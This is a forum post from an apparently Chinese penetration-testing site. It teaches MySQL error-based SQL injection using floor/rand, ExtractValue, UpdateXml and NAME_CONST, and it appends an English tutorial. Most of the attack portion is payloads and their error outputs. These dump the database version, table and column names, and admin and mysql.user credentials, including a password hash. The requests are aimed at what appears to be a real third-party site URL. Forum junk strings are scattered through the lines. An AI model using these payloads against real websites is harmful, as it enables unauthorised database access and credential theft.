中国网络渗透测试联盟

标题: mysql ,floor,ExtractValue,UpdateXml三种报错模式注入利用方法 [打印本页]
作者: admin    时间: 2015-11-11 19:03
标题: mysql ,floor,ExtractValue,UpdateXml三种报错模式注入利用方法

1、通过floor报错

可以通过如下一些利用代码

and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union   select null union   select  !1)x group by concat((select table_name from information_schema.tables  limit 1),floor(rand(0)*2)));

举例如下:1 q, `% j7 b7 O, Q* Q5 e+ I" k
首先进行正常查询:

mysql> select * from article where id = 1;. `$ E8 e7 a. }5 N7 }. h) A
+—-+——-+———+
" _# S; b$ b8 `9 t4 O! d& W| id | title | content |2 }6 z* T, a9 Y7 h( ^9 P
+—-+——-+———+) K, V! N, E  v  I- g/ p
|  1 | test  | do it   |6 v9 t# A% F" ^, k% t
+—-+——-+———+

假如id输入存在注入的话,可以通过如下语句进行报错。

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a);
6 }1 E) J8 k% n7 dERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’

可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
1 D. |1 ]8 t( F, O7 [# A2 T例如我们需要查询管理员用户名和密码:

Method1:

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat((select pass from admin where id  =1),floor(rand(0)*2))x from information_schema.tables group by x)a);$ L- d+ w  G- d4 L* Y) L; Z
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

Method2:

mysql> select * from article where id = 1 and (select count(*)  from (select 1 union   select null union   select !1)x group by  concat((select pass from admin limit 1),floor(rand(0)*2)));
1 T# R/ p  j0 zERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

2、ExtractValue
4 D0 B4 I* V' o2 u" @$ m! f测试语句如下

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

实际测试过程

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–0 i/ U# Z9 h& X  W1 g
ERROR 1105 (HY000): XPATH syntax error: ’\admin888′

3、UpdateXml

测试语句

and 1=(updatexml(1,concat(0x3a,(select user())),1))

实际测试过程

mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’

$ ]! ?% L& f2 B/ N2 r

) T: u4 ^. D. @0 B4 T3 N& B

再收集:

& e( ^% e. x% v/ e  C4 v
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c) - h$ H0 e" w: o/ P; H
2 [; D9 [3 o3 R$ s1 ^9 L
Erroruplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’( w, P3 T/ C. I/ v& _6 b* W3 b

: X7 G$ }4 _) G: v$ I' q8 `* K8 Ihttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)
5 b& A% ]# \2 q3 ^& k& i! c" \) M  z& Z, R- O
Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′
/ |6 m" r" X1 H9 B. O9 e7 Y
8 l& J+ I; P6 |$ W# D) `) V* QMYSQL高版本报错注入技巧-利用NAME_CONST注入0 L+ I8 ~) L! ]
It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.
) f/ O- z/ l: _% c# ?, i5 x% l& ?, O1 }4 d3 s
; i$ Z+ q1 w4 D8 y
相关信息5 s" D, Z. a5 D
9 K2 ]& @$ m9 i0 ^
NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.
, P' l1 \8 S( R6 G
; w" ]  V* |/ g' `) s5 b- x0 MCode:* L% B6 Z8 Z: [3 P1 N, R5 z
NAME_CONST(DATA, VALUE)
$ t8 T2 _5 N% U8 s8 s/ x( F/ v( {( y: d. Y; H' L
Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.. m1 ^% V+ i3 `( v6 A
' j1 J; [7 }4 j+ ~
SELECT NAME_CONST('TEST', 1)
5 J" F* m  G; |  M. y4 S7 Y$ w9 N: G8 _
* ~8 ~- s' h8 A- z$ K: K' M6 ^9 O
$ V' J5 P/ t" p6 A  R6 N
|---------------|
- N$ X" h4 W; K: `+ I% {|     TEST      |, Y0 C/ ?& E' @+ `1 s& H
|               |
9 W$ \- c. G8 }# I|---------------|
; [8 D( x; M1 I" C8 \; v/ n|       1       |* A# ]4 d- _/ y* |" Z9 \" O% {
|               |
% |! p6 O5 p' O9 E|---------------|
# X9 _' H  I7 R- m; b7 b, K, C  s3 {4 g3 A4 f+ g; O& [
0 i) e& i8 b/ H7 g" ]4 P& Z5 I3 Y
& Q8 t7 @! {3 i6 S

. I) N' I0 n. c# rhttp://dev.mysql.com/doc/refman/5.0/en/m...name-const
' ~8 Y& H4 k% f0 x. jIntro to MySQL Variables
- \  ]- y6 U- e: o1 N$ x: h
4 Z1 e! n& J( COnce you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.
+ |$ p" ^0 H& `) i3 v+ i
- O: a3 D1 O: o2 @* nCode:9 y0 `! Q* _& }5 x9 U8 `
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261
3 n( L0 T* N% P! [4 s# m) C+ Y: K/ ~* D4 a
; F' k3 E0 p& K

* j$ H7 `! [$ x6 `# _, V+ {0 M% R1 }' B3 [4 O0 g* {9 }  f/ C+ d, [: g
2 r# W# ?) Z( w* i3 J
Code:
: ]" ^* p6 Q5 oand+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--, Q/ q8 Z7 w! U8 x0 i) |, Y% M

$ t3 @: k; J" I# u0 P7 k5 b5 {/ a+ a2 C
VAR = Your MySQL variable.( L# M: K: G. i
9 ^* Q5 m. Q  X3 w+ U3 [
MySQL 5.1.3 Server System Variables
5 B+ C2 C2 w% k( p, e: l) f! p8 z4 J8 C5 q  K3 D+ @
Let's try it out on my site..! ^6 ]: T) B& b4 C9 ]3 ]1 W
0 m: L5 h& X8 N
Code:
/ N8 {0 }- t4 |. ]http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--
6 M2 t( \2 u# A/ m7 `+ w
$ s9 D& C3 i/ M. t& l! e8 LErroruplicate column name '5.0.27-community-nt'9 H$ @/ K% J+ @# E' A
# a, E5 ?9 a5 |+ B/ n& i

8 W; d7 _* u; S& S) H: y( Z( Q4 t& H5 C! `  o
7 z: v! p- J) [# d8 h
; D1 C! y4 U* o; a+ u  B
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...
+ K% T1 F: d* s
0 @+ B! Z  `2 sData Extraction
2 }5 S( R" p4 K) ^& c, j3 a) R- `+ I9 s9 b/ H
Code:
4 `5 W3 F: i6 y8 h" o. H+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--& @! U+ K8 C; m8 c: F
) k% ]( s* N3 S5 @9 G0 @  [- T

  S0 {! Q( l3 ?- z; m, Z( g1 FWe should get a duplicate column 1 error...  `. n& C7 h, T) {+ S$ V

$ Q! v( a% q! ~  V. wCode:
6 K+ }" D  Q8 R1 U( m* c, p' Phttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--& q( S8 t0 b  K3 X5 ]* U3 `5 ^

1 ?- ?9 @; ]8 v( p2 sErroruplicate column name '17 w: |' S7 g& q
+ c: l7 }4 s- Z2 K
0 p- w3 C3 _5 {0 m' K% j/ A
- ^' G, o' g/ I) s
3 ^4 M& j3 I) L+ ~& a2 P
' P6 R) E- m: u% J, t: m
* W5 U- s6 S% D0 t6 J+ L
Now let's get the tables out this bitch..
% c6 q  @2 {: k+ t3 w1 r
; C6 u9 q0 e4 G- _" Y. B  nCode:3 |% |+ p* {: q( }) L' R
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--: h- ?" }7 y6 u! w1 M" N

1 c  ^, U1 P1 z; {) w* d/ P
8 E3 H# n. b% d7 R/ C, PLet's see if it works here, if it does, we can go on and finish the job.
0 a" o; ^% y' h# q
; `, P, s' n. J2 z# e) ZCode:2 Q4 R, a9 Y9 K  {7 U7 f, ]3 J, n
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
: Y$ ?1 P6 [" b3 {/ n; E' w7 }* w/ x- h% w4 n0 ]& T

+ K% }# k3 @. B3 r/ k; a) U. J) ]Erroruplicate column name 'com_admanage
# I1 M, y% Q. C+ \: y2 w: |* Y" I, ?  w
3 [" C/ J9 [# O4 U8 R

/ q: E' Y4 l0 H$ w7 Q- `4 ~) v8 W, _6 l/ @/ M
3 ^% ~* q* N: N

0 I) D" O0 V# w- x/ [Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.
& |2 {' g; y' }; r6 O
6 a- N# `9 j8 {5 dLet's get the columns out of the user table..
' k1 h. N. D: u5 Y4 F3 u' k: s5 t9 U
Code:
/ M2 _5 Q, z  q+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--# c5 {- i9 h9 Q4 y: Q3 I0 {. o
( F/ |4 a9 h) P1 \
& I$ i: `0 o% l5 f$ j3 w$ M- ~0 x. {
So mine looks like this, and I get the duplicate column name 'Host'.3 z" |" A2 }- }6 A# h
2 Z% i' Q/ q( j: I+ t
Code:( t" }+ ?+ t. \- s1 f
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--! c8 `6 P0 [/ I$ [* v
& c5 U, `; |  g& n
Erroruplicate column name 'Host'- H/ o) F4 H" N  j

: @" A/ ^7 M5 B+ a- Q! x! f2 I+ ~& B0 w2 Y6 c, Y. h

; j+ O" s( ~4 ^) U+ G( G0 N. R1 z8 }. u' _, B

# j+ k) q/ ?: i* t, i  a: y. z2 i+ D* R. r2 s
Woot, time to finish this bitch off.
" k0 n+ E! I6 x6 j  c# a
5 s8 A5 D5 h% qCode:
8 `" u' E2 x+ Q' ]' [6 x+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--& O: ?7 P/ K; \

0 [. q% [* p8 _: L, p+ B# [/ [& _% F' n+ Z
So mine looks like this..., ]) L/ M6 [5 ]' {4 u  A
4 x: |% I- j' J" }0 z. D0 G
Code:
& f  z; o) ]( mhttp://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--
* M2 b7 a3 _; e8 H% }  q2 O) L% r8 h& Q, D" Z* \( z# g, O
Erroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'8 Q9 X* |9 g& K1 |
' R! F+ F) S4 r' b6 U4 k: T
: p1 R- |! _& H$ _1 g% f; p1 V! l
: }) |0 \4 R+ M) K6 \+ @& |

2 j. v5 x' M$ n1 o' y! P+ K. M1 q' W. X4 Q* s$ h; q' c
2 H9 d7 O  C0 P* G
And there we have it, thanks for reading.
  ^5 q& e8 t7 Q9 }3 v% d% O4 B9 i; K& q) S6 P




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2